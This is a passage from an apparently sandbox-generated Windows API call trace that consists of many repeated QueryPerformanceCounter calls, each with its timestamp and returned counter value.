lpPerformanceCount=0x6adfdfc*=3096476327226) returned 1 [0145.944] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096476344978) returned 1 [0145.960] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096477927539) returned 1 [0145.960] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096477945382) returned 1 [0145.978] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096479711881) returned 1 [0145.978] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096479728900) returned 1 [0145.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096481273824) returned 1 [0145.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096481290594) returned 1 [0146.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096482874499) returned 1 [0146.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096482891633) returned 1 [0146.026] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096484477529) returned 1 [0146.026] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096484494742) returned 1 [0146.042] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096486076449) returned 1 [0146.042] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096486093606) returned 1 [0146.058] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096487676690) returned 1 [0146.058] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096487692992) returned 1 [0146.074] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096489276421) returned 1 [0146.074] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096489293458) returned 1 [0146.090] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096490871353) returned 1 [0146.090] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096490884776) returned 1 [0146.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096492474468) returned 1 [0146.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096492491773) returned 1 [0146.122] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096494085056) returned 1 [0146.122] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096494132311) returned 1 [0146.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096495878185) returned 1 [0146.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096495897198) returned 1 [0146.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096497477104) returned 1 [0146.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096497493474) returned 1 [0146.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096499073848) returned 1 [0146.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096499090229) returned 1 [0146.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096500670357) returned 1 [0146.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096500684342) returned 1 [0146.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096502273353) returned 1 [0146.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096502289555) returned 1 [0146.220] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096503872957) returned 1 [0146.220] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096503887602) returned 1 [0146.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096505473436) returned 1 [0146.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096505489422) returned 1 [0146.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096507526438) returned 1 [0146.256] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096507543502) returned 1 [0146.271] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096508973750) returned 1 [0146.271] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096508990449) returned 1 [0146.287] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096510611941) returned 1 [0146.287] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096510626931) returned 1 [0146.303] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096512171667) returned 1 [0146.303] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096512185932) returned 1 [0146.318] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096513750299) returned 1 [0146.319] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096513763921) returned 1 [0146.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096515661113) returned 1 [0146.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096515678593) returned 1 [0146.353] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096517241709) returned 1 [0146.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096517255539) returned 1 [0146.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096518955539) returned 1 [0146.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096518981981) returned 1 [0146.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096520614078) returned 1 [0146.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096520632309) returned 1 [0146.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096522195507) returned 1 [0146.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096522209545) returned 1 [0146.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096523793810) returned 1 [0146.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096523807226) returned 1 [0146.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096525389243) returned 1 [0146.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096525402567) returned 1 [0146.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096527006259) returned 1 [0146.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096527031272) returned 1 [0146.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096528597319) returned 1 [0146.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096528615697) returned 1 [0146.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096530195282) returned 1 [0146.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096530208748) returned 1 [0146.500] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096531855802) returned 1 [0146.500] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096531875638) returned 1 [0146.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096533393653) returned 1 [0146.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096533407478) returned 1 [0146.531] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096534991811) returned 1 [0146.531] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096535004936) returned 1 [0146.547] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096536591866) returned 1 [0146.547] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096536605454) returned 1 [0146.563] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096538220870) returned 1 [0146.566] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096538509051) returned 1 [0146.579] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096539804941) returned 1 [0146.579] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096539820013) returned 1 [0146.595] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096541378205) returned 1 [0146.595] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096541412467) returned 1 [0146.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096542946244) returned 1 [0146.611] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096542959732) returned 1 [0146.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096544518496) returned 1 [0146.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096544531423) returned 1 [0146.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096546125711) returned 1 [0146.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096546143728) returned 1 [0146.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096547689526) returned 1 [0146.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096547705813) returned 1 [0146.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096549291198) returned 1 [0146.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096549308386) returned 1 [0146.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096550891479) returned 1 [0146.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096550909289) returned 1 [0146.706] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096552493407) returned 1 [0146.706] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096552509938) returned 1 [0146.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096554092687) returned 1 [0146.722] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096554109758) returned 1 [0146.738] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096555692333) returned 1 [0146.738] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096555709327) returned 1 [0146.754] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096557292193) returned 1 [0146.754] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096557308531) returned 1 [0146.770] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096558892750) returned 1 [0146.770] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096558909968) returned 1 [0146.786] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096560493869) returned 1 [0146.786] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096560510848) returned 1 [0146.802] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096562094953) returned 1 [0146.802] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096562111367) returned 1 [0146.818] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096563720703) returned 1 [0146.818] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096563737035) returned 1 [0146.834] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096565291677) returned 1 [0146.834] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096565305617) returned 1 [0146.850] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096566886685) returned 1 [0146.850] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096566900055) returned 1 [0146.866] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096568492150) returned 1 [0146.866] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096568506073) returned 1 [0146.882] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096570086301) returned 1 [0146.882] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096570100065) returned 1 [0146.898] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096571694594) returned 1 [0146.898] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096571707574) returned 1 [0146.914] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096573288555) returned 1 [0146.914] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096573304891) returned 1 [0146.930] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096574885069) returned 1 [0146.930] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096574899049) returned 1 [0146.946] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096576485631) returned 1 [0146.946] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096576499147) returned 1 [0146.962] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096578092321) returned 1 [0146.962] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096578106500) returned 1 [0146.978] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096579687360) returned 1 [0146.978] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096579701568) returned 1 [0146.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096581272489) returned 1 [0146.994] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096581287767) returned 1 [0147.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096582872840) returned 1 [0147.010] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096582886966) returned 1 [0147.026] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096584467485) returned 1 [0147.026] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096584480416) returned 1 [0147.042] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096586071343) returned 1 [0147.042] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096586086118) returned 1 [0147.058] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096587672280) returned 1 [0147.058] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096587685406) returned 1 [0147.074] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096589268212) returned 1 [0147.074] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096589282542) returned 1 [0147.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096594427595) returned 1 [0147.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096594441013) returned 1 [0147.126] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096594471997) returned 1 [0147.126] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096594483724) returned 1 [0147.138] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096595667440) returned 1 [0147.138] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096595683480) returned 1 [0147.155] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096597411084) returned 1 [0147.155] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096597424396) returned 1 [0147.171] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096598971246) returned 1 [0147.171] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096598988178) returned 1 [0147.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096600705347) returned 1 [0147.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096600720004) returned 1 [0147.203] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096602249785) returned 1 [0147.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096602264650) returned 1 [0147.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096603972331) returned 1 [0147.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096603985811) returned 1 [0147.237] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096605566164) returned 1 [0147.237] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096605580384) returned 1 [0147.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096607282053) returned 1 [0147.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096607307732) returned 1 [0147.270] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096608872042) returned 1 [0147.270] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096608888689) returned 1 [0147.286] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096610465970) returned 1 [0147.286] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096610480027) returned 1 [0147.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096612110408) returned 1 [0147.302] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096612185387) returned 1 [0147.318] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096613698747) returned 1 [0147.318] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096613712872) returned 1 [0147.334] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096615265665) returned 1 [0147.334] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096615279079) returned 1 [0147.350] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096616865263) returned 1 [0147.350] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096616878297) returned 1 [0147.367] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096618579454) returned 1 [0147.367] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096618592852) returned 1 [0147.382] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096620068401) returned 1 [0147.382] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096620082626) returned 1 [0147.398] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096621669501) returned 1 [0147.398] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096621683087) returned 1 [0147.413] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096623253005) returned 1 [0147.414] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096623269927) returned 1 [0147.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096624848564) returned 1 [0147.430] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096624862377) returned 1 [0147.446] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096626456803) returned 1 [0147.446] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096626485736) returned 1 [0147.462] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096628057627) returned 1 [0147.462] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096628078017) returned 1 [0147.479] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096629797438) returned 1 [0147.479] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096629814376) returned 1 [0147.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096631971678) returned 1 [0147.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096631991707) returned 1 [0147.510] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096632950414) returned 1 [0147.511] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096632967727) returned 1 [0147.526] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096634551872) returned 1 [0147.527] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096634568705) returned 1 [0147.543] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096636157767) returned 1 [0147.543] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096636175425) returned 1 [0147.558] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096637751747) returned 1 [0147.559] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096637768148) returned 1 [0147.576] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096639504711) returned 1 [0147.576] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096639521352) returned 1 [0147.590] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096640950639) returned 1 [0147.591] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096640966500) returned 1 [0147.606] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096642926109) returned 1 [0147.611] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096642965800) returned 1 [0147.623] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096644201531) returned 1 [0147.623] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096644243269) returned 1 [0147.638] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 